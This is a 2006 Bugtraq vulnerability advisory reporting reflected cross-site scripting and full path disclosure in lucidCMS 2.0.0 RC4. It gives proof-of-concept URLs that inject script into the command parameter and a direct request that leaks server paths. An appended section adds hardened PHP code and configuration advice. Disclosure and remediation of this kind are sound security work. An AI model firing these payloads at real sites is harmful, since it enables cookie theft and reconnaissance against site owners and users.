Message-ID: <20060402130713.wldv1cwbw4gc0wwk@webmail.kecoak.or.id>
Date: Sun, 02 Apr 2006 13:07:13 +0700
From: crasher@...oak.or.id
To: bugtraq@...urityfocus.com
Subject: Multiple Vulnerabilities in LucidCMS


Multiple Vulnerabilities in LucidCMS

 Author   : Rusydi Hasan M
 a.k.a    : cR45H3R
 Date     : April 1st, 2006
 Location : Indonesia, Cilacap

--- Software description

 lucidCMS is a simple and flexible content management system for
 the individual or organization that wishes to manage a collection
 of web pages without the overhead and complexity of other available
 open source "community" CMS options.

 HOME    : http://lucidCMS.net
 Version : 2.0.0 RC4

--- The bugs

 There are 2 bugs: XSS and full path disclosure.

--- PoC


1. XSS a.k.a Cross site scripting

   Proof of concept:

   http://[victim]/[lucidcms_dir]/index.php?command=login'>[XSS_here]
   http://[victim]/[lucidcms_dir]/index.php?i18n=cs_CZ&command=panel'>[XSS_here]
   http://[victim]/[lucidcms_dir]/index.php?i18n=en_US&command=panel'>[XSS_here]

   Example:

   http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><script>alert(document.cookie)</script>

   http://127.0.0.1/lucidcms/index.php?i18n=en_US&command=panel'><h1>Bla bla bla</h1>

   http://127.0.0.1/lucidcms/index.php?command=login'><script>alert('patch your lucidCMS')</script>

   http://127.0.0.1/lucidcms/index.php?i18n=cs_CZ&command=panel'><h1>stooopidz</h1>


2. Full path disclosures

   in /lucid_phplib/translator.php

   http://[victim]/[lucidcms_dir]/lucid_phplib/translator.php

   Warning: opendir(DIR_LANG): failed to open dir: No such file or directory in
   /var/www/html/lucidcms/lucid_phplib/translator.php on line 45

   Warning: readdir(): supplied argument is not a valid Directory resource in
   /var/www/html/lucidcms/lucid_phplib/translator.php on line 46

   Where's the problem?

   function get_languages(){
	$langs = array();
	$dir = opendir(DIR_LANG); // <-- This is the trouble
	while($name = readdir($dir)) { // <-- and this too
		if ($name == '.' || $name== '..') continue;
		$langFile = DIR_LANG.$name.'/LC_MESSAGES/'.CONFIG_DOMAIN.'.mo';
		if (file_exists($langFile)) {
//			$GLOBALS['echoLater'][] = $langFile; //troubleshooting...
			$langs[] = $name;
		}
	}
	return $langs;
}//get_languages


--- vendor

   I'm too lazy :D .

--- shoutz

1. kecoak
(fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,etc)
2. echo staff (y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,
anonymous, the day)
3. ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,negative,sakitjiwa

--- contact

   crasher@...oak.or.id
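
A hardened counterpart to the two issues above, as an added example that is not part of the original advisory and not lucidCMS code. The names h(), safe_command() and get_languages_checked(), the allow-list pattern and the 'login' fallback are assumptions; the advisory does not show the template that prints "command".

```php
<?php
// Added example, not lucidCMS code. Assumption: "command" is echoed into a
// single-quoted HTML attribute, as the '> prefix in the PoC URLs suggests.

// Encode for HTML text and attribute contexts. ENT_QUOTES matters here:
// without it the single quote that closes the attribute is not encoded.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list the command name before it is used anywhere. The pattern and
// the 'login' fallback are assumptions, not the project's rules.
function safe_command($raw): string {
    $ok = is_string($raw) && preg_match('/\A[a-z_]{1,32}\z/', $raw) === 1;
    return $ok ? $raw : 'login';
}

// get_languages() with both failure points handled. The warning text
// "opendir(DIR_LANG)" shows the literal constant name used as the path,
// i.e. DIR_LANG is undefined when translator.php is requested directly.
function get_languages_checked(): array {
    $langs = array();
    if (!defined('DIR_LANG') || !defined('CONFIG_DOMAIN') || !is_dir(DIR_LANG)) {
        return $langs;
    }
    $dir = opendir(DIR_LANG);
    if ($dir === false) {
        return $langs;
    }
    // Strict comparison: a directory entry named "0" must not end the loop.
    while (($name = readdir($dir)) !== false) {
        if ($name === '.' || $name === '..') continue;
        $langFile = DIR_LANG . $name . '/LC_MESSAGES/' . CONFIG_DOMAIN . '.mo';
        if (file_exists($langFile)) {
            $langs[] = $name;
        }
    }
    closedir($dir);
    return $langs;
}

// Constructed input, shaped like the PoC URLs in the advisory.
$payload = "panel'><h1>Bla bla bla</h1>";
echo "<form action='index.php?command=" . h($payload) . "'>\n";
echo safe_command($payload), "\n";
var_dump(get_languages_checked());
```

Setting display_errors to Off in the production php.ini keeps any remaining warning text, and the filesystem path it contains, out of HTTP responses.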


